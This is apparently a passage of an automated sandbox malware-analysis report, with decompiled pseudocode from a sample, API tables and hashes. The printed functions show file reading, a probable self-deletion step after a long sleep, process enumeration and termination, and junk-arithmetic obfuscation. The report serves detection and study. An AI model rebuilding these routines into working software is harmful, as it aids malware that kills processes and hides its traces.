					asm("fsubp st1, st0");
					 *0x3ce110 = _t151;
					 *0x3ce5dc =  *0x3ce5dc + _t126;
				}
				if(_t91 == _t126) {
					L12:
					_t97 =  *0x3d0284; // 0x490
					E0038D240(_t151, _t97);
					_t153 =  *0x3ce088 -  *0x3c75c8;
					 *0x3ce088 = _t153;
					_t115 =  *0x3ce088; // 0x8f400000
					_t62 =  *0x3ce08c; // 0xc1de0b20
					_t98 =  *0x3ce024; // 0x80000001
					_v16 = _t98;
					asm("fild dword [ebp-0xc]");
					_v12 = _t115;
					_v8 = _t62;
					asm("fsubr qword [ebp-0x8]");
					 *0x3ce170 = _t153 -  *0x3c7e28;
					E0039C990( &_v20508, 0, 0x5001);
					_t64 =  *0x3ce4fc; // 0x94b9
					_t99 =  *0x3ce234; // 0x82cc2880
					_t117 =  *0x3ce38c; // 0x93fc1fee
					__eflags = _t117 - _t64 - _t99 + 0xfa57fe7a;
					if(_t117 < _t64 - _t99 + 0xfa57fe7a) {
						 *0x3ce188 =  *0x3ce188 -  *0x3c75c8;
						_t69 =  *0x3ce188; // 0x71880000
						_t100 =  *0x3ce18c; // 0x4209846c
						_v12 = _t69;
						_v8 = _t100;
						 *0x3ce4b0 =  *0x3ce4b0 + _v12;
					}
					__eflags = 0;
					return 0;
				} else {
					_t118 =  *0x3ce580; // 0xffff
					_t101 =  *0x3ce2fc; // 0x3a84af9e
					_t127 = _a12;
					_t29 = _t118 + 0xbcedddf; // 0x46538d7d
					 *0x3ce2fc = _t101 + _t29;
					while(1) {
						ReadFile(_t91,  &_v20508, 0x5000,  &_v24, 0);
						_t73 = E00391B00(_t151,  &_v20508, 0x1400, _t127);
						_t130 = _t130 + 0xc;
						_t127 = _t73;
						E00391810(_t128, E0038CEE0(_t73) + _v24);
						if(E00395940() == 0) {
							break;
						}
						E00390A30(_t128,  &_v20508, _v24);
						if(_v24 > 0) {
							continue;
						} else {
							CloseHandle(_t91);
							_t122 =  *0x3d0284; // 0x490
							E0038D240(_t151, _t122);
							E0039C990( &_v20508, 0, 0x5001);
							_v12 =  *0x3ce1a4;
							asm("fsubr qword [ebp-0x8]");
							_v12 =  *0x3ce380;
							 *0x3ce5fc =  *0x3ce5fc + _v12;
							return 1;
						}
						goto L15;
					}
					_t121 =  *0x3ce0bc; // 0xdec
					_t79 = _t121 + 0x680650fd;
					__eflags = _t79;
					_v16 = _t79;
					asm("fild dword [ebp-0xc]");
					_v12 = _t151;
					_t151 =  *0x3ce5ac + _v12;
					 *0x3ce5ac =  *0x3ce5ac + _v12;
					CloseHandle(_t91);
					goto L12;
				}
				L15:
			}

0x0038bc48
0x0038bc61
0x0038bc66
0x0038bc69
0x0038bc7c
0x0038bc85
0x0038bc91
0x0038bc94
0x0038bc97
0x0038bc9a
0x0038bc9d
0x0038bc9f
0x0038bca2
0x0038bd09
0x0038bd12
0x0038bd1b
0x0038bd24
0x0038bd27
0x0038bd29
0x0038bd2f
0x0038bd31
0x0038bd33
0x0038bd39
0x0038bd3c
0x0038bd3e
0x0038bd44
0x0038bd47
0x0038bd4a
0x0038bd53
0x0038bd56
0x0038bd62
0x0038bd6b
0x0038bd6e
0x0038bd74
0x0038bd74
0x0038bd74
0x0038bca4
0x0038bca4
0x0038bcaa
0x0038bcac
0x0038bcae
0x0038bcb4
0x0038bcba
0x0038bcbd
0x0038bcc0
0x0038bcc9
0x0038bcd5
0x0038bcd8
0x0038bcde
0x0038bce1
0x0038bce4
0x0038bcec
0x0038bcec
0x0038bd7a
0x0038bd7f
0x0038bd82
0x0038bd85
0x0038bd8a
0x0038bd90
0x0038bd95
0x0038bd9c
0x0038bda4
0x0038bdb7
0x0038bdbd
0x0038bdc3
0x0038bdc5
0x0038bdca
0x0038bdd0
0x0038bdd7
0x0038bdeb
0x0038bded
0x0038bdf3
0x0038be02
0x0038be05
0x0038be08
0x0038be0a
0x0038be10
0x0038be10
0x0038be19
0x0038bf2c
0x0038bf2c
0x0038bf33
0x0038bf3e
0x0038bf4b
0x0038bf51
0x0038bf57
0x0038bf5c
0x0038bf62
0x0038bf65
0x0038bf68
0x0038bf6b
0x0038bf74
0x0038bf7e
0x0038bf84
0x0038bf89
0x0038bf8f
0x0038bf95
0x0038bfa6
0x0038bfa8
0x0038bfb6
0x0038bfbc
0x0038bfc1
0x0038bfcd
0x0038bfd0
0x0038bfd6
0x0038bfd6
0x0038bfde
0x0038bfe4
0x0038be1f
0x0038be1f
0x0038be26
0x0038be2c
0x0038be32
0x0038be39
0x0038be40
0x0038be53
0x0038be66
0x0038be6b
0x0038be70
0x0038be7d
0x0038be8b
0x00000000
0x00000000
0x0038be9a
0x0038bea3
0x00000000
0x0038bea5
0x0038bea6
0x0038beac
0x0038beb3
0x0038bec6
0x0038bed1
0x0038bede
0x0038bee8
0x0038bef4
0x0038befd
0x0038befd
0x00000000
0x0038bea3
0x0038befe
0x0038bf08
0x0038bf08
0x0038bf0d
0x0038bf11
0x0038bf14
0x0038bf1d
0x0038bf20
0x0038bf26
0x00000000
0x0038bf26
0x00000000

APIs

CreateFileA.KERNEL32(02D81058,80000000,00000001,00000000,00000003,00000000,00000000,74CB4EE0), ref: 0038BDB7
ReadFile.KERNEL32(00000000,?,00005000,?,00000000), ref: 0038BE53
CloseHandle.KERNEL32(00000000,?,?), ref: 0038BEA6
_memset.LIBCMT ref: 0038BEC6
CloseHandle.KERNEL32(00000000,?), ref: 0038BF26
_memset.LIBCMT ref: 0038BF84

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: CloseFileHandle_memset$CreateRead
String ID:
API String ID: 222164253-0
Opcode ID: 527b553fb51cdd80aea651ebda59e32d576da51823b96e8397869573aea357de
Instruction ID: 805d8f512e2609161a934baa7ee20a77170d28d69db2e04b7454106b813ad0a2
Opcode Fuzzy Hash: 527b553fb51cdd80aea651ebda59e32d576da51823b96e8397869573aea357de
Instruction Fuzzy Hash: DEA1E575900618EBDB06EF61FC84EADBB7CFB88300F118495D880E22A4DB347660CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00395A00 Relevance: 9.2, APIs: 6, Instructions: 186
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00395A00(intOrPtr _a4) {
				long long _v12;
				intOrPtr _v16;
				char _v296;
				char _v300;
				char _v560;
				char _v561;
				char _v1080;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t26;
				void* _t28;
				void* _t35;
				unsigned int _t36;
				void* _t39;
				int _t42;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t57;
				void* _t64;
				short _t67;
				intOrPtr _t68;
				void* _t69;
				void _t70;
				signed int _t72;
				intOrPtr _t81;
				intOrPtr _t83;
				signed int _t88;
				void _t90;
				intOrPtr _t92;
				intOrPtr _t93;
				void* _t101;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t115;
				long long _t134;

				_t26 = E0038CEE0(_t25);
				if(_t26 > 0x8000) {
					_t28 = E00386790( &_v296);
					_t134 =  *0x3ce074;
					_t67 =  *0x3ce028; // 0x781d
					_v12 = _t134;
					_t110 = _t28;
					_t68 =  *0x3ce24c; // 0x2b07f8d9
					_v16 = 0x60938709 - _t67 - _t68;
					asm("fild dword [ebp-0xc]");
					asm("fsubr qword [ebp-0x8]");
					 *0x3ce074 = _t134;
					 *0x3ce028 =  *0x3ce028 + 1;
					_t88 = E00396680(_t134) & 3;
					if(_t88 < 0) {
						_t88 = (_t88 - 0x00000001 | 0xfffffffc) + 1;
					}
					E00391BC0(_t115 + _t110 - 0x124, _t88 + 7);
					_t35 = E0038CF90(_t88 + 7, _t134, 0x1611, 5);
					_t64 = _t35;
					_t69 = _t35;
					do {
						_t90 =  *_t35;
						_t35 = _t35 + 1;
					} while (_t90 != 0);
					_t36 = _t35 - _t69;
					_t111 = _t69;
					_t101 =  &_v296 - 1;
					do {
						_t70 =  *(_t101 + 1);
						_t101 = _t101 + 1;
						_t131 = _t70;
					} while (_t70 != 0);
					_t72 = _t36 >> 2;
					memcpy(_t111 + _t72 + _t72, _t111, memcpy(_t101, _t111, _t72 << 2) & 0x00000003);
					_t39 = E0038CF90(_t131, _t134, 0x29a1, 3);
					E00396570(5, _t64);
					_t112 = E0039D699( &_v296, _t39);
					_t42 = E00396570(3, _t39);
					_t132 = _t112;
					if(_t112 != 0) {
						_push(_t112);
						_push(1);
						_push(E0038CEE0(_t42));
						_push(E00391FC0(_t43, _a4));
						E0039DBE8(_t64, _t90, _a4, _t112, _t132);
						_push(_t112);
						E0039DA1D(_t64, _t90, _a4, _t112, _t132);
						E0038CB90(_a4, _t132);
						_v300 = 0;
						GetModuleFileNameA(0,  &_v560, 0x104);
						asm("fld1");
						asm("faddp st1, st0");
						_v12 =  *0x3ce134;
						asm("fsubr qword [ebp-0x8]");
						_v12 =  *0x3ce3a0;
						 *0x3ce0f4 =  *0x3ce0f4 + _v12;
						_v561 = 0;
						 *0x3ce3a0 =  *0x3ce3a0 +  *0x3c75c8;
						_t49 = E0038CF90(_t132,  *0x3ce3a0 +  *0x3c75c8, 0x1618, 0x15);
						 *0x3ce478 =  *0x3ce478 - 1;
						_t114 = _t49;
						_t50 =  *0x3ce478; // 0x80000000
						_t81 =  *0x3d04b0; // 0x2d81180
						_t92 =  *0x3d050c; // 0x2d81058
						_push(_t81);
						_push(_t92);
						 *0x3ce398 = _t50 + 0x3953da14;
						E0039E0C2( &_v1080, 0x207, _t49,  &_v560);
						 *0x3ce2d8 =  *0x3ce2d8 + 1;
						_t93 =  *0x3ce31c; // 0xd3ba
						_t83 =  *0x3ce2d8; // 0xaffc
						if(_t83 == _t93 + 0x94bbc7e8) {
							 *0x3ce098 =  *0x3ce160 *  *0x3ce098;
						}
						E00396570(0x15, _t114);
						_t57 =  *0x3d04b0; // 0x2d81180
						E003896D0(_t114, _t57);
						 *0x3ce0b4 =  *0x3ce0b4 -  *0x3c7db0;
						E00386260( *0x3ce0b4 -  *0x3c7db0,  &_v296,  &_v1080);
						E0039C990( &_v1080, 0, 0x208);
						E0039C990( &_v560, 0, 0x105);
						Sleep(0x15f90);
						_t42 = DeleteFileA( &_v296);
					}
					return _t42;
				}
				return _t26;
			}

0x00395a0c
0x00395a16
0x00395a26
0x00395a2b
0x00395a31
0x00395a38
0x00395a3b
0x00395a40
0x00395a4f
0x00395a52
0x00395a55
0x00395a58
0x00395a5e
0x00395a6d
0x00395a73
0x00395a79
0x00395a79
0x00395a86
0x00395a92
0x00395a9a
0x00395a9c
0x00395aa0
0x00395aa0
0x00395aa2
0x00395aa3
0x00395aad
0x00395aaf
0x00395ab1
0x00395ab2
0x00395ab2
0x00395ab5
0x00395ab6
0x00395ab6
0x00395abc
0x00395acd
0x00395acf
0x00395ad9
0x00395aee
0x00395af0
0x00395af8
0x00395afa
0x00395b03
0x00395b04
0x00395b0d
0x00395b15
0x00395b16
0x00395b1b
0x00395b1c
0x00395b26
0x00395b39
0x00395b40
0x00395b4c
0x00395b50
0x00395b63
0x00395b6c
0x00395b6f
0x00395b7b
0x00395b87
0x00395b94
0x00395b9a
0x00395b9f
0x00395ba5
0x00395ba7
0x00395bac
0x00395bb2
0x00395bb8
0x00395bbe
0x00395bbf
0x00395bd9
0x00395bde
0x00395be5
0x00395bec
0x00395c03
0x00395c11
0x00395c11
0x00395c1a
0x00395c1f
0x00395c25
0x00395c44
0x00395c4a
0x00395c5d
0x00395c70
0x00395c7d
0x00395c8a
0x00395c8a
0x00000000
0x00395c92
0x00395c96

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00395B40
__snprintf.LIBCMT ref: 00395BD9
_memset.LIBCMT ref: 00395C5D
_memset.LIBCMT ref: 00395C70
Sleep.KERNEL32(00015F90), ref: 00395C7D
DeleteFileA.KERNEL32(?), ref: 00395C8A

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: File_memset$DeleteModuleNameSleep__snprintf
String ID:
API String ID: 4186849704-0
Opcode ID: ffcfec8f27651e8bad81890499ea293add613236ee7cdc392aedaa79fb5184b0
Instruction ID: 39e5911277af122499c84ce7d7da94e8055d2419a498b31e7058bcb9887310c9
Opcode Fuzzy Hash: ffcfec8f27651e8bad81890499ea293add613236ee7cdc392aedaa79fb5184b0
Instruction Fuzzy Hash: 42512571900614ABDF17AB71FC46FAA3BBDEB88700F014084F645EB291EB747A90CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00389784 Relevance: 9.1, APIs: 6, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00389784(void* __eax, void* __ebx, void* __edx) {
				void* _t24;
				int _t27;
				intOrPtr _t28;
				signed char _t34;
				short _t35;
				void* _t42;
				char _t45;
				intOrPtr* _t46;
				intOrPtr _t47;
				void* _t53;
				long long _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				void* _t58;
				void* _t61;
				void* _t63;
				void* _t66;
				signed long long _t93;

				_t42 = __ebx;
				_t24 = __eax;
				while(1) {
					L2:
					_t45 =  *((intOrPtr*)(_t63 + _t24 - 0x114));
					 *((char*)(_t63 + _t24 - 0x23c)) = _t45;
					_t24 = _t24 + 1;
					if(_t45 != 0) {
						continue;
					}
					L3:
					E003C2BB6(_t63 - 0x23c);
					_t46 =  *((intOrPtr*)(_t63 + 8));
					_t66 = _t66 + 4;
					_t27 = _t63 - 0x23c;
					while(1) {
						_t53 =  *_t27;
						if(_t53 !=  *_t46) {
							break;
						}
						if(_t53 == 0) {
							L8:
							_t27 = 0;
						} else {
							_t57 =  *((intOrPtr*)(_t27 + 1));
							_t9 = _t46 + 1; // 0xd06804c4
							if(_t57 !=  *_t9) {
								break;
							} else {
								_t27 = _t27 + 2;
								_t46 = _t46 + 2;
								if(_t57 != 0) {
									continue;
								} else {
									goto L8;
								}
							}
						}
						L10:
						if(_t27 == 0) {
							_t61 = OpenProcess(1, _t27,  *(_t63 - 0x130));
							if(_t61 != 0) {
								_t42 = _t42 + 1;
								 *(_t63 - 8) =  *0x3ce420 -  *0x3ce1d8 -  *0x3c7870;
								 *0x3ce3b0 =  *0x3ce3b0 *  *(_t63 - 8);
								TerminateProcess(_t61, 0xffffffff);
								CloseHandle(_t61);
							}
						}
						_t54 =  *0x3ce528; // 0x1aa00000
						_t28 =  *0x3ce52c; // 0xc1ef0926
						 *0x3ce1b8 = _t54;
						 *0x3ce1bc = _t28;
						 *(_t63 - 0x138) = 0x128;
						 *0x3ce528 =  *0x3ce528 +  *0x3c75c8;
						_t47 =  *0x3ce028; // 0x781d
						 *0x3ce4e8 =  *0x3ce4e8 + 0xe8ebad64 - _t47;
						if(Process32Next(_t58, _t63 - 0x138) != 0) {
							_t24 = 0;
							do {
								goto L2;
							} while (_t45 != 0);
							goto L3;
						}
						CloseHandle(_t58);
						_t34 = E0039C990(_t63 - 0x23c, 0, 0x104);
						asm("fld1");
						asm("fsubp st1, st0");
						 *0x3ce420 =  *0x3ce420 -  *0x3c75c8;
						 *(_t63 - 8) =  *0x3ce050 -  *0x3c786c -  *0x3c7868;
						_t93 =  *0x3ce420;
						asm("fsubr qword [0x3c7860]");
						asm("fcomp qword [ebp-0x8]");
						asm("fnstsw ax");
						if((_t34 & 0x00000005) != 0) {
							_t56 =  *0x3ce2b0; // 0xef43cad8
							_t35 =  *0x3ce1c0; // 0xa815
							 *((intOrPtr*)(_t63 - 4)) = _t56;
							asm("fild dword [ebp-0x4]");
							 *((intOrPtr*)(_t63 - 4)) = _t35 + 0x32db348a;
							 *(_t63 - 0x10) = _t93;
							asm("fild dword [ebp-0x4]");
							 *(_t63 - 8) = _t93;
							asm("fsubr qword [ebp-0x10]");
							 *0x3ce2b0 = E0039CABC();
							 *0x3ce1c0 =  *0x3ce1c0 - 1;
							return _t42;
						} else {
							 *0x3ce090 = 0x4000000;
							 *0x3ce094 = 0x41b993e8;
							return _t42;
						}
					}
					asm("sbb eax, eax");
					asm("sbb eax, 0xffffffff");
					goto L10;
					L2:
					_t45 =  *((intOrPtr*)(_t63 + _t24 - 0x114));
					 *((char*)(_t63 + _t24 - 0x23c)) = _t45;
					_t24 = _t24 + 1;
				}
			}

0x00389784
0x00389784
0x00389790
0x00389790
0x00389790
0x00389797
0x0038979e
0x003897a1
0x00000000
0x00000000
0x003897a3
0x003897aa
0x003897af
0x003897b2
0x003897b5
0x003897c0
0x003897c0
0x003897c4
0x00000000
0x00000000
0x003897c8
0x003897dc
0x003897dc
0x003897ca
0x003897ca
0x003897cd
0x003897d0
0x00000000
0x003897d2
0x003897d2
0x003897d5
0x003897da
0x00000000
0x00000000
0x00000000
0x00000000
0x003897da
0x003897d0
0x003897e5
0x003897e7
0x003897f9
0x003897fd
0x0038980e
0x00389815
0x00389821
0x00389827
0x0038982e
0x0038982e
0x003897fd
0x00389834
0x0038983a
0x0038983f
0x00389845
0x0038985b
0x00389865
0x0038986b
0x00389877
0x0038988d
0x00389780
0x00389790
0x00000000
0x00000000
0x00000000
0x00389790
0x00389895
0x003898a9
0x003898b4
0x003898b9
0x003898cd
0x003898e5
0x003898e8
0x003898ee
0x003898f4
0x003898f7
0x003898fc
0x0038991a
0x00389920
0x00389926
0x00389929
0x00389935
0x00389938
0x0038993b
0x0038993e
0x0038994a
0x00389952
0x00389957
0x00389965
0x003898fe
0x003898ff
0x0038990b
0x00389919
0x00389919
0x003898fc
0x003897e0
0x003897e2
0x00000000
0x00389790
0x00389790
0x00389797
0x0038979e
0x0038979f

APIs

OpenProcess.KERNEL32(00000001,?,?,00000000), ref: 003897F3
TerminateProcess.KERNEL32(00000000,000000FF), ref: 00389827
CloseHandle.KERNEL32(00000000), ref: 0038982E
Process32Next.KERNEL32(00000000,00000128), ref: 00389885
CloseHandle.KERNEL32(00000000), ref: 00389895
_memset.LIBCMT ref: 003898A9

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: CloseHandleProcess$NextOpenProcess32Terminate_memset
String ID:
API String ID: 302034984-0
Opcode ID: 51d58af95669e36da7dbc3c94afa7ba667d2a84d2df0c04eab8e47e2a31d2089
Instruction ID: 4915ec00f7d6cd39d0df3d1b30a32b1b3abc07a3445888f9e926af523301e7da
Opcode Fuzzy Hash: 51d58af95669e36da7dbc3c94afa7ba667d2a84d2df0c04eab8e47e2a31d2089
Instruction Fuzzy Hash: E541CF70405208CBDB13AF21FC89BB93BBCFB49710F194096E985D22A0DB35B968CF40

Uniqueness

Uniqueness Score: -1.00%

Function 003B01D0 Relevance: 9.0, APIs: 6, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E003B01D0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x3cbe98);
				E003A29D0(__ebx, __edi, __esi);
				_t31 = E0039FFF2(__ebx, __edi, _t35);
				_t15 =  *0x3cf2b0; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E003A27E5(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x3cf1b8; // 0x2d81608
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x3ced90;
								if(__eflags != 0) {
									E0039CB4B(_t33);
								}
							}
						}
						_t21 =  *0x3cf1b8; // 0x2d81608
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x3cf1b8; // 0x2d81608
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E003B026B();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E0039DFAC(_t29, _t31, _t33, _t38);
				}
				return E003A2A15(_t33);
			}

0x003b01d0
0x003b01d0
0x003b01d0
0x003b01d0
0x003b01d2
0x003b01d7
0x003b01e1
0x003b01e3
0x003b01eb
0x003b020c
0x003b0212
0x003b0216
0x003b0219
0x003b021c
0x003b0222
0x003b0224
0x003b0226
0x003b022f
0x003b0231
0x003b0233
0x003b0239
0x003b023c
0x003b0241
0x003b0239
0x003b0231
0x003b0242
0x003b0247
0x003b024a
0x003b0250
0x003b0254
0x003b0254
0x003b025a
0x003b0261
0x003b01f3
0x003b01f3
0x003b01f3
0x003b01f6
0x003b01f8
0x003b01fa
0x003b01fc
0x003b0201
0x003b0209

APIs

__getptd.LIBCMT ref: 003B01DC

Part of subcall function 0039FFF2: __getptd_noexit.LIBCMT ref: 0039FFF5
Part of subcall function 0039FFF2: __amsg_exit.LIBCMT ref: 003A0002

__amsg_exit.LIBCMT ref: 003B01FC
__lock.LIBCMT ref: 003B020C
InterlockedDecrement.KERNEL32(?), ref: 003B0229
_free.LIBCMT ref: 003B023C
InterlockedIncrement.KERNEL32(02D81608), ref: 003B0254

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: d00387c3526e7310fae126cadce03ee94f14093b3730c3bcc2e59505f963ac70
Instruction ID: 2af39c2ce6b1de998958a279d491e354738c8946fe64c7c553c43d80b4bfc4f4
Opcode Fuzzy Hash: d00387c3526e7310fae126cadce03ee94f14093b3730c3bcc2e59505f963ac70
Instruction Fuzzy Hash: 3D010032900B11DFDB2BAB68980ABCFB364AF05B24F054415FA00EFA91CB306D46CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 003B6105 Relevance: 9.0, APIs: 6, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E003B6105(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				void* _t35;
				intOrPtr* _t37;
				void* _t38;
				void* _t39;

				_t39 = __eflags;
				_t27 = __ebx;
				_push(0xc);
				_push(0x3cc188);
				E003A29D0(__ebx, __edi, __esi);
				_t35 = E0039FFF2(__ebx, __edi, _t39);
				_t37 = E003B1B61(8, 1);
				 *((intOrPtr*)(_t38 - 0x1c)) = _t37;
				_t40 = _t37;
				if(_t37 != 0) {
					E003B098F(__ebx, __edx, _t35, _t37, __eflags);
					E003B01D0(_t27, __edx, _t35, _t37, __eflags);
					 *_t37 =  *((intOrPtr*)(_t35 + 0x6c));
					 *(_t37 + 4) =  *(_t35 + 0x68);
					E003A27E5(_t27, 0xc);
					_t5 = _t38 - 4;
					 *_t5 =  *(_t38 - 4) & 0x00000000;
					__eflags =  *_t5;
					E003B06CF( *_t37);
					 *(_t38 - 4) = 0xfffffffe;
					E003B619F();
					E003A27E5(_t27, 0xd);
					 *(_t38 - 4) = 1;
					InterlockedIncrement( *(_t37 + 4));
					 *(_t38 - 4) = 0xfffffffe;
					E003B61AB();
					_t24 = _t37;
				} else {
					 *((intOrPtr*)(E0039FA66(_t40))) = 0xc;
					_t24 = 0;
				}
				return E003A2A15(_t24);
			}

0x003b6105
0x003b6105
0x003b6105
0x003b6107
0x003b610c
0x003b6116
0x003b6123
0x003b6125
0x003b6128
0x003b612a
0x003b613b
0x003b6140
0x003b6148
0x003b614d
0x003b6152
0x003b6158
0x003b6158
0x003b6158
0x003b615e
0x003b6164
0x003b616b
0x003b6172
0x003b6178
0x003b6182
0x003b6188
0x003b618f
0x003b6194
0x003b612c
0x003b6131
0x003b6137
0x003b6137
0x003b619b

APIs

__getptd.LIBCMT ref: 003B6111

Part of subcall function 0039FFF2: __getptd_noexit.LIBCMT ref: 0039FFF5
Part of subcall function 0039FFF2: __amsg_exit.LIBCMT ref: 003A0002

__calloc_crt.LIBCMT ref: 003B611C

Part of subcall function 003B1B61: Sleep.KERNEL32(00000000), ref: 003B1B89

__lock.LIBCMT ref: 003B6152
___addlocaleref.LIBCMT ref: 003B615E
__lock.LIBCMT ref: 003B6172
InterlockedIncrement.KERNEL32(?), ref: 003B6182

Part of subcall function 0039FA66: __getptd_noexit.LIBCMT ref: 0039FA66

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__getptd
String ID:
API String ID: 3803058747-0
Opcode ID: 0fe426471dd1881eeb6915282c8fc8599a5dee571170227333e17a19dd5b6829
Instruction ID: 5fc8752ca30c3d0b7e2c34656a3f8b5575f46e192b45f50ad4728e9baf7b8770
Opcode Fuzzy Hash: 0fe426471dd1881eeb6915282c8fc8599a5dee571170227333e17a19dd5b6829
Instruction Fuzzy Hash: A401B131500700EFEB26BBBC8843B8DB7A0AF45724F204109F5559F6D3DB745A418B61

Uniqueness

Uniqueness Score: -1.00%

Function 003B2A6C Relevance: 7.6, APIs: 5, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E003B2A6C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t27;
				signed int _t34;
				signed int _t36;
				signed char _t42;
				intOrPtr* _t46;
				void* _t49;
				signed int _t56;
				void* _t57;

				_t55 = __esi;
				_t49 = __edx;
				_push(0xc);
				_push(0x3cbfa0);
				E003A29D0(__ebx, __edi, __esi);
				 *(_t57 - 0x1c) = 0;
				_t42 = 0;
				if(( *(_t57 + 0xc) & 0x00000008) != 0) {
					_t42 = 0x20;
				}
				if(( *(_t57 + 0xc) & 0x00004000) != 0) {
					_t42 = _t42 | 0x00000080;
				}
				if(( *(_t57 + 0xc) & 0x00000080) != 0) {
					_t42 = _t42 | 0x00000010;
				}
				_t27 = GetFileType( *(_t57 + 8));
				if(_t27 != 0) {
					__eflags = _t27 - 2;
					if(__eflags != 0) {
						__eflags = _t27 - 3;
						if(__eflags == 0) {
							_t42 = _t42 | 0x00000008;
							__eflags = _t42;
						}
					} else {
						_t42 = _t42 | 0x00000040;
					}
					_t56 = E003B28D3(_t42, _t49, 0, _t55, __eflags);
					 *(_t57 + 0xc) = _t56;
					__eflags = _t56 - 0xffffffff;
					if(__eflags != 0) {
						 *((intOrPtr*)(_t57 - 4)) = 0;
						E003B269D(_t42, _t56,  *(_t57 + 8));
						_t46 = 0x3d1760 + (_t56 >> 5) * 4;
						_t34 = (_t56 & 0x0000001f) << 6;
						 *( *_t46 + _t34 + 4) = _t42 | 0x00000001;
						 *( *_t46 + _t34 + 0x24) =  *( *_t46 + _t34 + 0x24) & 0x00000080;
						 *( *_t46 + _t34 + 0x24) =  *( *_t46 + _t34 + 0x24) & 0x0000007f;
						 *(_t57 - 0x1c) = 1;
